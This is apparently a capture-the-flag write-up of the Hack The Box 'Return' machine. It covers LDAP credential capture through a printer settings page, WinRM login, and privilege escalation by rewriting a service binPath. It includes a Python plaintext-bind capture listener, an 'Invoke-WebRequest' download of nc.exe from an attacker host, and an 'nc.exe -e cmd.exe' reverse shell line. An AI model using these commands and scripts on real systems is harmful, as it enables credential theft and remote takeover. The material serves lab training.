[HTB] Return Writeup
TL;DR
The printer settings page on the web application allows the LDAP server address to be changed. Pointing it at the attacker IP made the target bind to a listener on TCP 389 with an LDAP simple bind, which carries the password in plaintext, so the svc-printer credentials were exposed. Using svc-printer over WinRM, membership in Server Operators allowed the VMTools service configuration to be modified. The service binPath was replaced with nc.exe, and restarting the service spawned a SYSTEM shell.
1. Recon
The Nmap scan showed a Windows host exposing web, SMB, LDAP, Kerberos, and WinRM-related services. Kerberos, LDAP, and SMB together on one host is the usual signature of an Active Directory domain controller, so the machine was treated as part of an AD environment from the start.
2. Initial Access - Printer Configuration Credential Capture
The web application exposed a printer settings page.
http://10.129.95.241/settings.php
The settings page contained the LDAP connection settings used by the printer service, including the address of the LDAP server and the account it binds with. Only the server address was changed: it was set to the attacker IP, leaving the stored account in place.
After the configuration was saved, the target connected back to the attacker machine on TCP 389 and performed an LDAP simple bind with the stored account. A simple bind sends the password in plaintext inside the BindRequest, so a plain TCP listener on port 389 (netcat is enough) receives the credentials without any LDAP implementation on the attacker side.
The following credential was recovered.
svc-printer:1edFg43012!!
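To see exactly what the listener receives, the following Python script decodes an LDAP BindRequest from its BER encoding and pulls out the bind DN and password. It is added here as an illustration and is not part of the original write-up or of any HTB tooling. The two sample messages are constructed by hand rather than captured: the DN CN=svc-printer,CN=Users,DC=return,DC=local is an assumed value, while the password is the one recovered above. The SASL sample shows the failure mode a practitioner should expect: a SASL bind (Kerberos, NTLM over GSS-SPNEGO) never puts the password on the wire, so only a simple bind yields plaintext.

```python
import socket
import sys
from typing import NamedTuple

# BER tags used in an LDAPMessage carrying a BindRequest (RFC 4511).
TAG_SEQUENCE = 0x30
TAG_INTEGER = 0x02
TAG_OCTET_STRING = 0x04
TAG_BIND_REQUEST = 0x60   # [APPLICATION 0], constructed
TAG_AUTH_SIMPLE = 0x80    # AuthenticationChoice simple [0], primitive
TAG_AUTH_SASL = 0xA3      # AuthenticationChoice sasl [3], constructed


class BindCredentials(NamedTuple):
    message_id: int
    version: int
    name: str      # LDAPDN the client binds as
    method: str    # "simple" or "sasl"
    secret: str    # plaintext password for simple, mechanism name for sasl


def _read_tlv(buf: bytes, pos: int):
    """Decode one BER tag-length-value at buf[pos]; return (tag, value, next_pos).

    LDAP only uses single-byte tags, so multi-byte tag forms are not handled.
    """
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: low bits = number of length octets
        n = length & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("unsupported or truncated long-form length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    end = pos + length
    if end > len(buf):
        raise ValueError("truncated TLV value")
    return tag, buf[pos:end], end


def parse_bind_request(data: bytes) -> BindCredentials:
    """Extract credentials from a raw LDAPMessage containing a BindRequest."""
    tag, message, _ = _read_tlv(data, 0)
    if tag != TAG_SEQUENCE:
        raise ValueError("not an LDAPMessage")
    tag, msg_id, pos = _read_tlv(message, 0)
    if tag != TAG_INTEGER:
        raise ValueError("missing messageID")
    tag, bind, _ = _read_tlv(message, pos)
    if tag != TAG_BIND_REQUEST:
        raise ValueError(f"protocolOp tag 0x{tag:02x} is not a BindRequest")
    tag, version, pos = _read_tlv(bind, 0)
    if tag != TAG_INTEGER:
        raise ValueError("missing version")
    tag, name, pos = _read_tlv(bind, pos)
    if tag != TAG_OCTET_STRING:
        raise ValueError("missing name")
    tag, auth, _ = _read_tlv(bind, pos)
    if tag == TAG_AUTH_SIMPLE:
        method, secret = "simple", auth.decode("utf-8", "replace")
    elif tag == TAG_AUTH_SASL:
        # SASL: SEQUENCE { mechanism OCTET STRING, credentials OCTET STRING OPTIONAL }.
        # No plaintext password here; record the mechanism so the operator knows why.
        mech_tag, mech, _ = _read_tlv(auth, 0)
        if mech_tag != TAG_OCTET_STRING:
            raise ValueError("malformed SASL credentials")
        method, secret = "sasl", mech.decode("utf-8", "replace")
    else:
        raise ValueError(f"unknown authentication choice 0x{tag:02x}")
    return BindCredentials(
        int.from_bytes(msg_id, "big", signed=True),
        int.from_bytes(version, "big"),
        name.decode("utf-8", "replace"),
        method,
        secret,
    )


def capture_once(bind_addr: str = "0.0.0.0", port: int = 389):
    """Accept one connection, parse its first message, return (peer, credentials)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_addr, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            data = conn.recv(4096)
        return peer, parse_bind_request(data)


# Constructed sample messages (not captured traffic). Both share one prefix:
# LDAPMessage(66 bytes) { messageID 1, BindRequest(61 bytes) { version 3, name } }.
_SAMPLE_PREFIX = (
    b"\x30\x42"
    b"\x02\x01\x01"
    b"\x60\x3d"
    b"\x02\x01\x03"
    b"\x04\x2aCN=svc-printer,CN=Users,DC=return,DC=local"   # assumed DN, 42 bytes
)
SAMPLE_SIMPLE_BIND = _SAMPLE_PREFIX + b"\x80\x0c1edFg43012!!"      # simple [0], 12-byte password
SAMPLE_SASL_BIND = _SAMPLE_PREFIX + b"\xa3\x0c\x04\x0aGSS-SPNEGO"  # sasl [3] { mechanism }

if __name__ == "__main__":
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 389
    peer, creds = capture_once(port=port)
    print(f"{peer[0]}:{peer[1]} bind as {creds.name!r} via {creds.method}: {creds.secret!r}")
```

Binding port 389 needs root or CAP_NET_BIND_SERVICE; pass a different port on the command line if the settings page lets you choose one. The listener closes without answering, which is enough for a one-shot capture; the target simply sees a failed bind.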
The recovered credential was then used to authenticate to the target over WinRM.
└─$ evil-winrm -i 10.129.95.241 -u 'svc-printer' -p '1edFg43012!!'
3. Privilege Escalation - Server Operators to SYSTEM via Service Configuration Abuse
*Evil-WinRM* PS C:\Users\svc-printer\Documents> net user svc-printer
The svc-printer account was a member of the Server Operators group.
This matters because Server Operators is a built-in group that exists on domain controllers for routine server administration: members can log on locally, manage shares and backups, and start and stop services. On this host the group's rights extended to changing service configuration, which is enough to run arbitrary code under the service's account.
The Evil-WinRM services command was used to list services and whether the current user has privileges to modify them.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> services
The output listed the VMTools service with Privileges=True:
Path Privileges Service
---- ---------- -------
"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" True VMTools
The Privileges column reports whether the current user can modify the service, so True meant the VMTools configuration, including its binary path, could be rewritten by svc-printer.
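The Privileges flag can be verified by hand from the service's security descriptor, which sc.exe sdshow VMTools prints as an SDDL string. The Python script below, added here as an illustration and not part of the original write-up or of Evil-WinRM, parses a service DACL and performs the same access check Windows does (ACEs walked in order, a deny on any still-wanted bit wins, allows accumulate) for the set of SIDs a token holds. Both descriptors in the script are constructed examples; the real VMTools descriptor is not shown on the page, and the group SIDs assumed for svc-printer are an assumption too.

```python
import re
from typing import List, NamedTuple, Set

# Service-specific access rights and their SDDL two-letter abbreviations
# (from the Windows service security descriptor documentation).
SERVICE_RIGHTS = {
    "CC": 0x00001,  # SERVICE_QUERY_CONFIG
    "DC": 0x00002,  # SERVICE_CHANGE_CONFIG  (allows rewriting binPath)
    "LC": 0x00004,  # SERVICE_QUERY_STATUS
    "SW": 0x00008,  # SERVICE_ENUMERATE_DEPENDENTS
    "RP": 0x00010,  # SERVICE_START
    "WP": 0x00020,  # SERVICE_STOP
    "DT": 0x00040,  # SERVICE_PAUSE_CONTINUE
    "LO": 0x00080,  # SERVICE_INTERROGATE
    "CR": 0x00100,  # SERVICE_USER_DEFINED_CONTROL
    "SD": 0x10000,  # DELETE
    "RC": 0x20000,  # READ_CONTROL
    "WD": 0x40000,  # WRITE_DAC
    "WO": 0x80000,  # WRITE_OWNER
}
SERVICE_CHANGE_CONFIG = SERVICE_RIGHTS["DC"]
SERVICE_START = SERVICE_RIGHTS["RP"]
SERVICE_STOP = SERVICE_RIGHTS["WP"]
SERVICE_ALL_ACCESS = 0xF01FF
# SDDL SID aliases that matter for this check.
SID_NAMES = {
    "SY": "NT AUTHORITY\\SYSTEM", "BA": "BUILTIN\\Administrators",
    "SO": "BUILTIN\\Server Operators", "IU": "NT AUTHORITY\\INTERACTIVE",
    "SU": "NT AUTHORITY\\SERVICE", "AU": "NT AUTHORITY\\Authenticated Users",
    "WD": "Everyone",
}


class Ace(NamedTuple):
    ace_type: str   # "A" allow, "D" deny
    mask: int
    sid: str


def _rights_mask(rights: str) -> int:
    """Turn an SDDL rights field ("CCDCLC..." or "0x1234") into an access mask."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    mask = 0
    for i in range(0, len(rights), 2):
        token = rights[i:i + 2]
        if token == "GA":                 # GENERIC_ALL maps to every service right
            mask |= SERVICE_ALL_ACCESS
        elif token in SERVICE_RIGHTS:
            mask |= SERVICE_RIGHTS[token]
        else:
            raise ValueError(f"unknown right {token!r}")
    return mask


def parse_dacl(sddl: str) -> List[Ace]:
    """Return the DACL ACEs of an SDDL string in order; the SACL (S:) is ignored."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not m:
        raise ValueError("no DACL in descriptor")
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group(1)):
        fields = body.split(";")          # type;flags;rights;object;inherit_object;sid
        if len(fields) < 6:
            raise ValueError(f"malformed ACE {body!r}")
        ace_type, rights, sid = fields[0], fields[2], fields[5]
        if ace_type in ("A", "D"):        # object/audit/conditional ACEs are not relevant here
            aces.append(Ace(ace_type, _rights_mask(rights), sid))
    return aces


def access_check(sddl: str, token_sids: Set[str], desired: int) -> bool:
    """Mirror AccessCheck: walk ACEs in order, deny wins for any still-wanted bit."""
    remaining = desired
    for ace in parse_dacl(sddl):
        if ace.sid not in token_sids:
            continue
        if ace.ace_type == "D" and ace.mask & remaining:
            return False
        if ace.ace_type == "A":
            remaining &= ~ace.mask
        if remaining == 0:
            return True
    return remaining == 0


def who_can(sddl: str, right: int) -> List[str]:
    """Trustees with an allow ACE covering `right` and no earlier deny for it."""
    denied, granted = set(), []
    for ace in parse_dacl(sddl):
        if ace.ace_type == "D" and ace.mask & right:
            denied.add(ace.sid)
        elif ace.ace_type == "A" and ace.mask & right and ace.sid not in denied:
            granted.append(SID_NAMES.get(ace.sid, ace.sid))
    return granted


# Constructed descriptors (not taken from the target). The first is the usual
# locked-down shape; the second additionally grants Server Operators DC (change config).
SDDL_LOCKED = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
               "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
SDDL_WRITABLE = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                 "(A;;CCDCLCSWRPWPDTLOCRRC;;;SO)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)")
SVC_PRINTER_TOKEN = {"AU", "WD", "SO"}   # assumed group SIDs held by svc-printer

if __name__ == "__main__":
    for label, sddl in (("locked", SDDL_LOCKED), ("writable", SDDL_WRITABLE)):
        print(label, "Privileges=" + str(access_check(sddl, SVC_PRINTER_TOKEN, SERVICE_CHANGE_CONFIG)),
              "change-config trustees:", who_can(sddl, SERVICE_CHANGE_CONFIG))
```

Paste the output of sc.exe sdshow into SDDL_WRITABLE's place and the script reports the same yes/no that the Evil-WinRM column summarises, plus which trustees hold SERVICE_CHANGE_CONFIG. A service where only RP/WP (start/stop) are granted is not exploitable this way even though Server Operators can restart it.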
VMTools runs as LocalSystem, so whatever executable its binPath names is started as SYSTEM. Replacing the path with a reverse shell command therefore turns the next service start into a SYSTEM shell.
First, nc.exe was downloaded to the target from a web server on the attacker machine.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> Invoke-WebRequest -Uri http://10.10.14.37/nc.exe -Outfile C:\Users\svc-printer\Documents\nc.exe
Then the VMTools service binPath was changed to execute nc.exe.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config VMTools binPath= "C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.37 80"
[SC] ChangeServiceConfig SUCCESS
This changed the command executed when the VMTools service starts. The space after binPath= is required: sc.exe parses each option as "name= value" with the value as a separate argument, and without the space it prints its usage text instead of changing anything. Keep the original path from the services listing so the service can be restored afterwards.
On the attacker machine, a Netcat listener was started.
nc -lvnp 80
The VMTools service was then stopped and started.
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe stop VMTools
SERVICE_NAME: VMTools
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe start VMTools
After the service was started, the target connected back to the listener. Because nc.exe is not a real service binary it never reports a running state to the Service Control Manager, so the start request eventually times out and the process is terminated; the shell is short-lived, and anything that must be done should be chained into a single command line, as below, or used to launch a second, independent reverse shell.
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.37] from (UNKNOWN) [10.129.95.241] 55299
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami && ipconfig && type \Users\Administrator\Desktop\root.txt